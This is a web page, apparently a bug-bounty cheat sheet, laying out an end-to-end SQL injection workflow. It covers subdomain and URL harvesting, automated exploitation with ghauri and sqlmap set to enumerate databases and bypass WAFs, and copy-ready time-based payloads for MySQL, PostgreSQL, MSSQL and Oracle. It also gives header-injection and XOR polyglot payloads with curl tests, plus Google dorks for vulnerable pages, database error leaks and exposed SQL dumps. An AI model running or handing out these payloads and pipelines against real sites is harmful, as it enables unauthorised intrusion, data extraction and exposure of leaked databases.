SQL Injection Guide
Master SQL Injection recon and exploitation with step-by-step methodology, time-based payloads, and automated testing tools.
30+ Techniques5+ DBMS CoveredCopy Ready
Phase 0
Introduction
1What is SQL Injection?
SQL Injection = vulnerability allowing attackers to manipulate SQL queries2Complete methodology for finding SQL injection vulnerabilities
Master SQLi Recon: Step-by-Step Guide for Bug Bounty HuntersStep 1
Step 1: Recon the Target Subdomains
1For single domain - filter subdomains by technology
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'2For multiple subdomains listed in file
subfinder -dL subdomains.txt -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'Step 2
Step 2: Discovering Potential SQL Injection Endpoints
1Using gau to find URLs with parameters
echo https://example.com | gau | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" | grep "=" >urls.txt2Using Katana for deeper crawling (requires older version)
echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E ".php|.asp|.aspx|.jspx|.jsp" >urls2.txtStep 3
Step 3: Identify SQL-Prone URLs
1Filter URLs containing SQL injection parameters using gf
cat urls1.txt urls2.txt | gf sqli | uro > cleaned-sql.txtTool 4
Automated 1: Using ghauri
1Automate SQLi testing with ghauri (recommended)
ghauri -m cleaned-sql.txt --batch --dbs --level 3 --confirm2One-liner: subfinder + gau + gf + ghauri
subfinder -d example.com -all -silent | gau --threads 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirmTool 5
Automated 2: Using sqlmap
1Automate SQLi testing with sqlmap (advanced options)
sqlmap -m cleaned-sql.txt --batch --random-agent --tamper=space2comment --level=5 --risk=3 --drop-set-cookie --threads 10 --dbs2One-liner: subfinder + gau + gf + sqlmap
subfinder -d example.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agentDB 6
Time-Based 1: MySQL - Basic Delay
1Basic time-based delay in MySQL
SELECT SLEEP(10);2Inline injection with XOR logic and sleep
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z3Using benchmark with GROUP BY for delay (CPU-based)
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);4Boolean logic delay with IF statement
' OR IF(1=1, SLEEP(10), 0)-- -DB 7
Time-Based 2: PostgreSQL - Basic Delay
1Basic time-based delay in PostgreSQL
SELECT pg_sleep(10);2Conditional delay with string concatenation
' OR (CASE WHEN ((LOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='13More concise version with stacked query
' OR 1=1; SELECT pg_sleep(5);-- 4Using random() for variability in delay
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--DB 8
Time-Based 3: Microsoft SQL Server - Basic Delay
1Basic delay in MSSQL
WAITFOR DELAY '00:00:10';2Inline SQLi payload with WAITFOR
'; WAITFOR DELAY '00:00:05'; --3Conditional delay with IF statement
IF (1=1) WAITFOR DELAY '0:0:10';4Using IF EXISTS for more realism
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--DB 9
Time-Based 4: Oracle - Basic Delay
1Basic time delay using DBMS_PIPE in Oracle
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;2Inline SQLi payload with DBMS_PIPE
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--3Conditional check with delay in PL/SQL block
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;Header 10
Header-Based SQLi Testing
1#1 Inject via User-Agent header (MySQL)
User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z2#2 Inject via X-Forwarded-For header
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z3#3 Inject via Referer header with subquery
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"Test 11
Confirm Time Delays with curl
1#1 Confirm User-Agent injection with time measurement
time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"2#2 Confirm X-Forwarded-For injection
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"3#3 Confirm Referer injection
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"" "https://target.com/vulnerable-endpoint"XOR 12
Mastering XOR-Based SQL Injection
1XOR polyglot - weaponized XOR logic for bypassing filters
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/2Test XOR polyglot with curl and time measurement
time curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"3Download full list of advanced XOR-based SQLi payloads for all DBMS
https://github.com/coffinxp/loxs/tree/main/payloads/sqliDork 13
Google Dorks 1: Find URLs with Query Parameters
1#1 Find URLs with id parameter
site:*.domain.com inurl:id=2#2 Find product pages with id parameter
site:*.domain.com inurl=product.php?id=3#3 Find view pages with page parameter
site:*.domain.com inurl=view.php?page=4#4 Find item pages with cat parameter
site:*.domain.com inurl=item.php?cat=Dork 14
Google Dorks 2: By File Extension
1#1 Find PHP files
site:*.domain.com ext:php2#2 Find ASP files
site:*.domain.com ext:asp3#3 Find ASPX files
site:*.domain.com ext:aspx4#4 Find JSP files
site:*.domain.com ext:jsp5#5 Find JSPX files
site:*.domain.com ext:jspx6#6 Find CFM files
site:*.domain.com ext:cfm7#7 Find PL (Perl) files
site:*.domain.com ext:plDork 15
Google Dorks 3: Combine Extension + Parameters
1#1 PHP files with id parameter (high accuracy)
site:*.domain.com ext:php inurl:id=2#2 ASPX files with productid parameter
site:*.domain.com ext:aspx inurl=productid=3#3 JSP files with categoryid parameter
site:*.domain.com ext:jsp inurl=categoryid=Error 16
Error-Based 1: MySQL Errors
1#1 Classic MySQL syntax error
site:*.domain.com intext:"You have an error in your SQL syntax"2#2 MySQL function error
site:*.domain.com intext:"mysql_fetch_array() expects parameter"3#3 MySQL row count error
site:*.domain.com intext:"mysql_num_rows() expects parameter"4#4 Invalid MySQL result error
site:*.domain.com intext:"supplied argument is not a valid MySQL result resource"5#5 General MySQL warning
site:*.domain.com intext:"Warning: mysql_"6#6 MySQLi exception error
site:*.domain.com intext:"Fatal error: Uncaught mysqli_sql_exception"Error 17
Error-Based 2: MariaDB / PDO Errors
1#1 Deprecated MySQL function error
site:*.domain.com intext:"Fatal error: Call to undefined function mysql_connect()"2#2 PDO query warning
site:*.domain.com intext:"Warning: PDO::query()"3#3 PDO SQLSTATE error
site:*.domain.com intext:"SQLSTATE[HY000]"Error 18
Error-Based 3: PostgreSQL Errors
1#1 PostgreSQL query failed error
site:*.domain.com intext:"pg_query(): Query failed"2#2 PostgreSQL connection warning
site:*.domain.com intext:"Warning: pg_connect()"3#3 PostgreSQL ERROR message
site:*.domain.com intext:"PostgreSQL query failed: ERROR"Error 19
Error-Based 4: Microsoft SQL Server Errors
1#1 OLE DB provider error
site:*.domain.com intext:"Microsoft OLE DB Provider for SQL Server"2#2 Unclosed quotation mark (classic MSSQL error)
site:*.domain.com intext:"Unclosed quotation mark after the character string"3#3 ADODB field error
site:*.domain.com intext:"ADODB.Field error"4#4 MSSQL error code 80040e14
site:*.domain.com intext:"80040e14"Error 20
Error-Based 5: Oracle DB Errors
1#1 Oracle ORA-00933 error
site:*.domain.com intext:"ORA-00933: SQL command not properly ended"2#2 Oracle ORA-01756 error
site:*.domain.com intext:"ORA-01756: quoted string not properly terminated"3#3 Oracle oci_parse warning
site:*.domain.com intext:"Warning: oci_parse()"Error 21
Error-Based 6: DB2 / Informix / Generic
1#1 DB2 SQL error
site:*.domain.com intext:"DB2 SQL error:"2#2 Informix syntax error
site:*.domain.com intext:"Syntax error in string in query expression"3#3 Generic database query error
site:*.domain.com intext:"Error Executing Database Query"4#4 Generic query failed
site:*.domain.com intext:"Query failed:"5#5 Unexpected end of SQL
site:*.domain.com intext:"unexpected end of SQL command"6#6 Invalid SQL statement
site:*.domain.com intext:"invalid SQL statement"7#7 JDBC exception (Java DB connection)
site:*.domain.com intext:"JDBC Exception"Dump 22
Find Exposed Database Dumps or Config Files
1Find exposed database files by extension
site:example.com ext:sql | ext:db | ext:dbf | ext:bak | ext:old | ext:backup2Find database dumps in open directories
intitle:"index of" "db.sql"3Variant with database.sql
intitle:"index of" "database.sql"4Find SQL dump files
intitle:"index of" "dump.sql"Video 23
Resources to Master SQL Injection
1Video: Master SQL Injection from beginner to pro
https://www.youtube.com/watch?v=HD9201YJTfQ2Video: Advanced SQL injection techniques
https://www.youtube.com/watch?v=x1z4GxDtEo03WAF Bypass Masterclass with sqlmap + tamper scripts
https://infosecwriteups.com/waf-bypass-masterclass-using-sqlmap-with-proxychains-and-tamper-scripts-against-cloudflare-9d46b36bae944CoffinXP Python script for automated Google dorking
https://github.com/coffinxp/scripts/blob/main/dorking.py5Loxs tool - Automated SQL injection detection
https://github.com/coffinxp/loxsTip 24
Tips for Bug Bounty Hunters
1Don't limit to GET - POST often has more vulnerabilities
#1: Test both GET and POST requests2Use tamper scripts to bypass WAF filters
#2: Try tamper scripts like space2comment, between, or charencode with sqlmap3SQLi isn't just for URL parameters
#3: Mix payloads into JSON bodies, XML, headers and cookies4Even without data extraction, time delays indicate vulnerability
#4: Monitor 5xx errors, long delays, and unusual behavior5Burp Suite helps analyze responses and craft precise payloads
#5: Use a proxy like Burp to see responses in real-timeTools